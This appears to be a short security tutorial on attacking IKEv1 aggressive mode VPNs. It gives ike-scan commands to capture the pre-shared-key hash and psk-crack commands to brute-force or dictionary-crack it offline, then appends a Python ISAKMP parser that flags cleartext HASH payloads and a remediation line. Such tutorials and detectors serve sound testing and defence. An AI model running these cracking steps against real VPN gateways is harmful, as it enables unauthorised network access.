Exploiting IKE Aggressive Mode

date: 2022-07-10

In IKE aggressive mode, the authentication hash based on a pre-shared key (PSK) is transmitted in the response (HASH_R) to the initial packet of a VPN client that wants to establish an IPsec tunnel. This hash is not encrypted (in main mode the hash is encrypted).

The ike-scan tool can be used to test whether an IPsec VPN server is using IKE in aggressive mode:

sudo ike-scan -A "$IP_ADDRESS"

If aggressive mode is in use, then ike-scan can be used to save the initial exchange for offline cracking:

sudo ike-scan -A "$IP_ADDRESS" --id="$ID" -P"$KEY_FILE"

psk-crack can then be used to attempt to crack the resulting $KEY_FILE.

# Attempt to brute-force all keys up to $KEY_LENGTH using
# characters from $CHARSET (by default $CHARSET is numbers and
# lowercase ASCII characters).
#
psk-crack --charset="$CHARSET" -B "$KEY_LENGTH" "$KEY_FILE"

# Attempt to crack the PSK using a dictionary.
#
psk-crack -d "$WORDLIST_FILE" "$KEY_FILE"
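
For defenders, the cleartext HASH_R described at the top of this page is visible in captured UDP/500 traffic. The Python below is an added example, not from the original page or from the ike-scan project: it parses the ISAKMP header (RFC 2408) and walks the payload chain to flag aggressive mode messages that carry a HASH payload unencrypted. The function names and the sample message are constructed for illustration.

```python
import struct

# ISAKMP (IKEv1) header fields and values from RFC 2408.
HEADER = struct.Struct("!8s8sBBBBII")  # cookies, next, version, exchange, flags, msg id, length
EXCHANGE_MAIN, EXCHANGE_AGGRESSIVE = 2, 4
PAYLOAD_NONE, PAYLOAD_HASH = 0, 8
FLAG_ENCRYPTED = 0x01


def inspect_isakmp(datagram: bytes) -> dict:
    """Classify one UDP/500 payload and report whether it exposes a HASH payload."""
    if len(datagram) < HEADER.size:
        raise ValueError("shorter than an ISAKMP header")
    _, _, next_payload, version, exchange, flags, _, length = HEADER.unpack_from(datagram)
    if version >> 4 != 1:
        raise ValueError("not an IKEv1 message")
    if length > len(datagram):
        raise ValueError("message truncated")
    encrypted = bool(flags & FLAG_ENCRYPTED)
    payloads, offset = [], HEADER.size
    # The payload chain can only be walked when the body is not encrypted.
    while not encrypted and next_payload != PAYLOAD_NONE:
        if offset + 4 > length:
            raise ValueError("payload chain runs past the message")
        following, _, size = struct.unpack_from("!BBH", datagram, offset)
        if size < 4 or offset + size > length:
            raise ValueError("bad payload length")
        payloads.append(next_payload)
        next_payload, offset = following, offset + size
    aggressive = exchange == EXCHANGE_AGGRESSIVE
    return {"aggressive": aggressive, "encrypted": encrypted, "payloads": payloads,
            "cleartext_hash": aggressive and PAYLOAD_HASH in payloads}


def build_message(exchange: int, flags: int, chain: list) -> bytes:
    """Build a constructed message from (payload_type, body) pairs, for testing only."""
    body = b""
    for i, (_, data) in enumerate(chain):
        following = chain[i + 1][0] if i + 1 < len(chain) else PAYLOAD_NONE
        body += struct.pack("!BBH", following, 0, 4 + len(data)) + data
    first = chain[0][0] if chain else PAYLOAD_NONE
    return HEADER.pack(b"I" * 8, b"R" * 8, first, 0x10, exchange, flags, 0,
                       HEADER.size + len(body)) + body


# Constructed sample: aggressive mode reply carrying SA, KE, nonce, ID and HASH.
SAMPLE_REPLY = build_message(EXCHANGE_AGGRESSIVE, 0, [(1, b"sa"), (4, b"ke"), (10, b"nonce"),
                                                      (5, b"id"), (8, b"\x00" * 20)])

if __name__ == "__main__":
    print(inspect_isakmp(SAMPLE_REPLY))
```

A gateway that produces `cleartext_hash: True` replies is still accepting aggressive mode with PSK authentication; the corresponding fix is to require main mode or IKEv2 on that gateway.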